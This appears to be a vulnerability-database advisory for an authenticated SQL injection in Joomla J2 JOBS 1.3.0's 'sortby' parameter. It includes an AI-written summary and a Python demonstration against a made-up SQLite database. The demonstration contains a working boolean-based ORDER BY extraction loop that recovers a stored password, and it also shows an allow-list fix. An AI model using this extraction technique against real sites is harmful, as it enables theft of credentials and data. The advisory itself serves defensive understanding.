VYPR
High severity (7.1) · NVD Advisory · Published May 13, 2026 · Updated May 13, 2026

CVE-2020-37224

Description

Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Joomla J2 JOBS 1.3.0 has an authenticated SQL injection vulnerability in the 'sortby' parameter, allowing attackers to extract database contents.

Vulnerability

Overview

Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability in the 'sortby' parameter. The root cause is improper neutralization of user-supplied input when POST requests to the administrator index page are turned into database queries: the parameter value reaches the query without validation, so an attacker can inject SQL into it, as demonstrated by the publicly available exploit [3]. The issue is classified under CWE-89 (SQL Injection) [4].

Exploitation

Details

An attacker must first authenticate to the Joomla backend (low privileges required, per the CVSS v4 vector [4]). The attack is performed by sending a crafted POST request to /administrator/index.php with a malicious sortby value. The exploit-db entry provides a full request example, in which the vulnerable parameter appears as js_sortby, together with a sqlmap command for automated exploitation [3]. No special network position is needed beyond the ability to reach the administrative interface with valid credentials.

Impact

Successful exploitation allows an attacker to extract sensitive information from the Joomla database, such as user credentials, session data, or configuration details. The CVSS v4 vector indicates a high impact on confidentiality, with low impact on integrity and no impact on availability [4]. The vulnerability does not require high privileges, making it a significant risk for sites running the affected version.

Mitigation

As of the publication date, version 1.3.0 is confirmed vulnerable. Users should upgrade to a patched version of J2 JOBS if one is available. The vendor's product page [1] does not explicitly mention a fix, but given the public exploit [3], immediate action is recommended. No workarounds are documented; upgrading is the primary mitigation. Until a fix is confirmed, limiting backend accounts to trusted users reduces exposure, since any authenticated backend user can reach the affected parameter.
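The following is an illustrative example added for this page; it is not J2 JOBS's own code and does not reproduce the component's real tables, columns or queries. It assumes a hypothetical job-listing query whose sort column comes straight from a sortby request parameter, a constructed SQLite schema with a jobs table and a users table, and a made-up secret. It covers both the Exploitation section (how a sort-only injection still leaks data, which is the confidentiality impact the vector describes) and the Mitigation section (the allow-list fix that a patched version would need).

```python
import sqlite3

# Constructed sample rows (not J2 JOBS data). Insertion order differs from
# alphabetical order on purpose, so "ORDER BY id" and "ORDER BY title" are
# distinguishable from the result ordering alone.
SAMPLE_ROWS = [
    ("Frontend Engineer", "2020-03-15"),
    ("Backend Developer", "2020-01-05"),
    ("Data Analyst", "2020-02-10"),
]
SAMPLE_SECRET = "s3cr3t"  # stands in for a credential an attacker wants

# Allow-list for the hardened variant: request value -> real column name.
ALLOWED_SORT = {"title": "title", "created": "created"}


def make_db():
    """Build an in-memory database with the constructed schema above."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, created TEXT)")
    con.executemany("INSERT INTO jobs (title, created) VALUES (?, ?)", SAMPLE_ROWS)
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', ?)", (SAMPLE_SECRET,))
    return con


def list_jobs_vulnerable(con, sortby):
    """Hypothetical vulnerable pattern: the sortby parameter is concatenated
    into ORDER BY. Bind parameters cannot carry identifiers, so developers
    often fall back to string concatenation here, which is injectable."""
    sql = "SELECT id, title FROM jobs ORDER BY " + sortby
    return [row[1] for row in con.execute(sql)]


def sort_is_allowed(sortby, direction="ASC"):
    """Validation used by the hardened variant: exact allow-list match only."""
    return sortby in ALLOWED_SORT and direction in ("ASC", "DESC")


def list_jobs_hardened(con, sortby, direction="ASC"):
    """Hardened variant: the request value selects a column from a fixed
    map, and anything outside the allow-list is rejected before the query
    string is built."""
    if not sort_is_allowed(sortby, direction):
        raise ValueError("invalid sort parameters")
    sql = "SELECT id, title FROM jobs ORDER BY %s %s" % (ALLOWED_SORT[sortby], direction)
    return [row[1] for row in con.execute(sql)]


def leak_secret_via_sort(con, max_len=16):
    """Boolean-based extraction through ORDER BY only. The injected CASE
    sorts by title when one guessed character of the secret is right and by
    id otherwise, so the attacker reads the answer from the row order of a
    normal-looking page of results. Stops at the first position where no
    character of the (constructed) alphabet matches."""
    title_order = list_jobs_vulnerable(con, "title")
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            payload = (
                "(CASE WHEN (SELECT substr(password,%d,1) FROM users WHERE id=1)='%s' "
                "THEN title ELSE id END)" % (pos, ch)
            )
            if list_jobs_vulnerable(con, payload) == title_order:
                found = ch
                break
        if found is None:
            break
        recovered += found
    return recovered


def run_demo():
    """Return (leaked secret, whether the hardened variant rejects the payload)."""
    con = make_db()
    payload = "(CASE WHEN 1=1 THEN title ELSE id END)"
    return leak_secret_via_sort(con), not sort_is_allowed(payload)


if __name__ == "__main__":
    secret, rejected = run_demo()
    print("recovered via sort order:", secret)
    print("hardened variant rejects payload:", rejected)
```

The point of the extraction loop is that nothing in the injected value needs to be a second statement or a UNION: a single expression in the sort clause is enough to pull one character per request, which is why a "sort parameter" injection still carries a high confidentiality impact.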

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 4

News mentions: 0 (no linked articles in the index yet)